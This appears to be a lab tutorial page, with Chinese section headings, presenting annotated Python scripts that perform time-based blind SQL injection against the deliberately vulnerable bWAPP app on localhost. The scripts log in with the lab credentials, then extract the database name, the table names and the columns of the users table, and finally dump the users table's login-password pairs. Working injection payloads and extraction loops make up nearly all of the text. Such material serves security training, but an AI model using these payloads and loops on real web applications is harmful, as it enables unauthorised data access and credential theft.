全局部分
python
# shlex.join is a shell-quoting join: items come out space separated and an
# empty item is rendered as '' -- that is why the recorded results further down
# read "b W A P P" and show '' gaps.  "".join would give the plain string.
from shlex import join
# HTTP client
import requests
# the side channel: wall-clock timing of every probe (sleep() inside the payload)
import time
# one Session shared by login() and all probes, so whatever login() sets
# (cookies) is sent along with the later requests
r = requests.session()
登录
python
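def login(login_url='http://127.0.0.1:1234/login.php', username='bee', password='bug'):
    """Log the shared session ``r`` into bWAPP so the later probes are authenticated.

    The defaults are the bWAPP lab credentials used on this page; point this at a
    different target only when you are authorised to test it.  ``security_level=0``
    is the form field bWAPP uses for its security level (presumably the lowest one).

    Returns the final ``requests.Response`` (the original returned nothing).
    Raises ``requests.HTTPError`` for a non-2xx status, so an unreachable or refusing
    target fails loudly instead of being followed by a run of meaningless timing
    probes.  Note that a 2xx does not prove the credentials were accepted -- the
    application may answer a wrong password with a normal 200 page -- so check the
    response body if in doubt.
    """
    form = {
        'login': username,
        'password': password,
        'security_level': 0,
        'form': 'submit',
    }
    # second positional argument of requests.post is the form body, as in the original
    res = r.post(login_url, form, timeout=10)
    print(res)  # status line, e.g. <Response [200]>
    res.raise_for_status()
    return res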
获取当前库名
python
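def get_db_name_length(*, delay=1, max_len=64, probe=None):
    """Infer ``length(database())`` with a time-based blind injection.

    One request per candidate length n = 1..``max_len``: the payload makes MySQL
    ``sleep(delay)`` only when the length equals n, so a response that takes longer
    than ``delay`` seconds reveals the answer.  Round-trip latency is added to every
    response, so on a slow link raise ``delay`` or the comparison yields false
    positives.

    delay: seconds the payload sleeps and the threshold for "the server delayed".
    max_len: upper bound of the scan; MySQL identifiers are at most 64 characters.
        The original looped forever when nothing matched.
    probe: optional ``callable(payload) -> bool`` that returns True when the target
        delayed.  Defaults to timing a GET of bWAPP's sqli_15.php on the shared
        session ``r``; inject a fake for testing or another transport.

    Returns the length as an int.
    Raises RuntimeError when no candidate up to ``max_len`` triggered the delay.
    """
    if probe is None:
        def probe(payload):
            # params= makes requests URL-encode the payload ("'", ' ', '&', '#');
            # string-building the URL as the original did does not guarantee that.
            start = time.monotonic()  # monotonic: immune to wall-clock adjustments
            r.get('http://127.0.0.1:1234/sqli_15.php',
                  params={'title': payload, 'action': 'search'},
                  timeout=5 * delay + 5)  # well above delay, so a true sleep never times out
            return time.monotonic() - start > delay
    for n in range(1, max_len + 1):
        if probe(f"1' or if(length(database())={n},sleep({delay}),1) -- "):
            return n
    raise RuntimeError(f'no delay observed for any length up to {max_len}')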
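def get_db_name(max, *, delay=1, probe=None):
    """Recover ``max`` characters of ``database()`` one byte at a time.

    For position i (1-based, as MySQL ``substr`` counts) every printable ASCII
    code 32..126 is tried with an ``ascii(substr(database(),i,1))=code`` payload
    until the server delays, so a character costs up to 95 requests.  The original
    scanned 48..127, which can never match ',', '-' or ' '; that is what left the
    '' gaps in the page's recorded table and user results.

    max: number of characters to recover (use get_db_name_length()).  The
        builtin-shadowing parameter name is kept for existing callers.
    delay: seconds the payload sleeps and the threshold for "the server delayed".
    probe: optional ``callable(payload) -> bool``; defaults to timing a GET of
        sqli_15.php on the shared session ``r``.

    Returns a list of ``max`` one-character strings; a position that matched no
    candidate stays ''.
    """
    if probe is None:
        def probe(payload):
            # params= makes requests URL-encode the payload ("'", ' ', '&', '#')
            start = time.monotonic()
            r.get('http://127.0.0.1:1234/sqli_15.php',
                  params={'title': payload, 'action': 'search'},
                  timeout=5 * delay + 5)  # above delay, so a true sleep never times out
            return time.monotonic() - start > delay
    chars = [''] * max
    for pos in range(1, max + 1):
        for code in range(32, 127):
            payload = (f"1' or if(ascii(substr(database(),{pos},1))={code},"
                       f"sleep({delay}),1) -- ")
            if probe(payload):
                chars[pos - 1] = chr(code)
                break
    return chars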
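# Drive the two steps above: the current database name comes back as a list of chars.
db_name = get_db_name(get_db_name_length())
# Plain concatenation -> 'bWAPP'.  The page originally used shlex.join, a shell-quoting
# join that separates items with spaces, and therefore recorded "b W A P P".
print("".join(db_name))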
获取全部表名
python
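def get_table_name_length(*, delay=1, max_len=4096, probe=None):
    """Infer the length of the comma-joined table list of schema bWAPP.

    The probed value is ``group_concat(table_name)`` over
    ``information_schema.tables where table_schema='bWAPP'``.  One request per
    candidate length n = 1..``max_len``; the payload sleeps only when the length
    equals n, so a response slower than ``delay`` seconds reveals the answer.
    Round-trip latency is added to every response, so on a slow link raise
    ``delay`` or the comparison yields false positives.  Note that group_concat
    output is truncated at the server's ``group_concat_max_len`` setting, so a
    schema with many tables may come back cut off.

    delay: seconds the payload sleeps and the threshold for "the server delayed".
    max_len: scan bound; the original looped forever when nothing matched.
    probe: optional ``callable(payload) -> bool``; defaults to timing a GET of
        sqli_15.php on the shared session ``r``.

    Returns the length as an int.
    Raises RuntimeError when no candidate up to ``max_len`` triggered the delay.
    """
    if probe is None:
        def probe(payload):
            # params= makes requests URL-encode the payload ("'", ' ', '&', '#')
            start = time.monotonic()
            r.get('http://127.0.0.1:1234/sqli_15.php',
                  params={'title': payload, 'action': 'search'},
                  timeout=5 * delay + 5)  # above delay, so a true sleep never times out
            return time.monotonic() - start > delay
    for n in range(1, max_len + 1):
        payload = ("1' or if(length((select group_concat(table_name) from "
                   "information_schema.tables where table_schema='bWAPP'))="
                   f"{n},sleep({delay}),1) -- ")
        if probe(payload):
            return n
    raise RuntimeError(f'no delay observed for any length up to {max_len}')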
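def get_table_name(max, *, delay=1, probe=None):
    """Recover ``max`` characters of the comma-joined table list of schema bWAPP.

    The probed value is ``group_concat(table_name)`` over
    ``information_schema.tables where table_schema='bWAPP'``.  Position i
    (1-based, as MySQL ``substr`` counts) is found by trying every printable ASCII
    code 32..126 with an ``ascii(substr(...))=code`` payload until the server
    delays, up to 95 requests per character.  The original scanned 48..127 and so
    never matched the ',' (ASCII 44) that group_concat puts between names -- hence
    the '' gaps in the page's recorded result.  Each recovered character is
    printed as progress, as in the original.

    max: number of characters to recover (use get_table_name_length()).  The
        builtin-shadowing parameter name is kept for existing callers.
    delay: seconds the payload sleeps and the threshold for "the server delayed".
    probe: optional ``callable(payload) -> bool``; defaults to timing a GET of
        sqli_15.php on the shared session ``r``.

    Returns a list of ``max`` one-character strings ('' where nothing matched).
    """
    if probe is None:
        def probe(payload):
            # params= makes requests URL-encode the payload ("'", ' ', '&', '#')
            start = time.monotonic()
            r.get('http://127.0.0.1:1234/sqli_15.php',
                  params={'title': payload, 'action': 'search'},
                  timeout=5 * delay + 5)  # above delay, so a true sleep never times out
            return time.monotonic() - start > delay
    chars = [''] * max
    for pos in range(1, max + 1):
        for code in range(32, 127):
            payload = ("1' or if(ascii(substr((select group_concat(table_name) from "
                       "information_schema.tables where table_schema='bWAPP'),"
                       f"{pos},1))={code},sleep({delay}),1) -- ")
            if probe(payload):
                print(chr(code))
                chars[pos - 1] = chr(code)
                break
    return chars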
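# All table names of the bWAPP schema, comma separated by group_concat.
table_name = get_table_name(get_table_name_length())
# Plain concatenation gives e.g. 'blog,heroes,movies,users,visitors' once the ','
# separators are matched.  The page originally recorded
# "b l o g '' h e r o e s '' m o v i e s '' u s e r s '' v i s i t o r s":
# shlex.join separates items with spaces and renders as '' the empty entries left
# where the 48..127 character scan could not match ',' (ASCII 44).
print("".join(table_name))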
获取字段名
仅需更改 sql_str：长度探测与逐字符探测的两个循环与上一步获取表名时完全相同，只是把查询对象换成 information_schema.columns，并用 table_name='users' 限定只取 users 表的字段。
python
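# Column names of the `users` table: the two loops from the table-name step are
# reused unchanged, only the payload differs.  `len` (candidate length / position)
# and `ACI` (candidate ASCII code) are the loop variables of those loops.
# The literals are split over several lines with implicit concatenation; the page
# showed them broken across lines, which is not valid Python.
# 1) length of the comma-joined column list
sql_str = (
    "1' or if(length((select group_concat(column_name) "
    "from information_schema.columns where table_schema='bWAPP' and table_name='users'))="
    f"{len},sleep(1),1) -- "
)
# 2) one character of that list at position `len`
sql_str = (
    "1' or if(ascii(substr((select group_concat(column_name) "
    "from information_schema.columns where table_schema='bWAPP' and table_name='users'),"
    f"{len},1))={ACI},sleep(1),1) -- "
)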
获取用户信息
python
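def get_users_passwd(*, delay=1, max_len=4096, probe=None):
    """Dump the ``login-password`` pairs of ``bWAPP.users`` as one comma-joined string.

    Step 1 finds the length of ``group_concat(concat(login,'-',password))`` with
    one request per candidate length; step 2 recovers each character by trying
    every printable ASCII code 32..126 until the server delays.  Progress (the
    length, then each character) is printed as in the original.

    Fixes against the original: its payload slept 0.1 s while the check waited
    for more than 1 s, so no probe could ever register and the length loop never
    ended; its character loop ran to ``cou - 1`` and dropped the last byte; and
    its 48..127 scan could not match ',' (44) or '-' (45), the very separators
    the query inserts.  The result now uses plain concatenation instead of the
    shell-quoting shlex.join.

    delay: seconds the payload sleeps and the threshold for "the server delayed";
        raise it on a slow link, since round-trip latency adds to every response.
    max_len: bound of the length scan; note group_concat output is also truncated
        at the server's ``group_concat_max_len`` setting.
    probe: optional ``callable(payload) -> bool``; defaults to timing a GET of
        sqli_15.php on the shared session ``r``.

    Returns the recovered string ('' at positions that matched no candidate).
    Raises RuntimeError when no length up to ``max_len`` triggered the delay.
    """
    if probe is None:
        def probe(payload):
            # params= makes requests URL-encode the payload ("'", ' ', '&', '#')
            start = time.monotonic()
            r.get('http://127.0.0.1:1234/sqli_15.php',
                  params={'title': payload, 'action': 'search'},
                  timeout=5 * delay + 5)  # above delay, so a true sleep never times out
            return time.monotonic() - start > delay
    query = "select group_concat(concat(login,'-',password)) from bWAPP.users"
    # step 1: total length of the joined dump
    for cou in range(1, max_len + 1):
        if probe(f"1' or if(length(({query}))={cou},sleep({delay}),1) -- "):
            print(cou)
            break
    else:
        raise RuntimeError(f'no delay observed for any length up to {max_len}')
    # step 2: one character per position, 1-based as MySQL substr counts
    chars = [''] * cou
    for pos in range(1, cou + 1):
        for code in range(32, 127):
            payload = (f"1' or if(ascii(substr(({query}),{pos},1))={code},"
                       f"sleep({delay}),1) -- ")
            if probe(payload):
                print(chr(code))
                chars[pos - 1] = chr(code)
                break
    return "".join(chars)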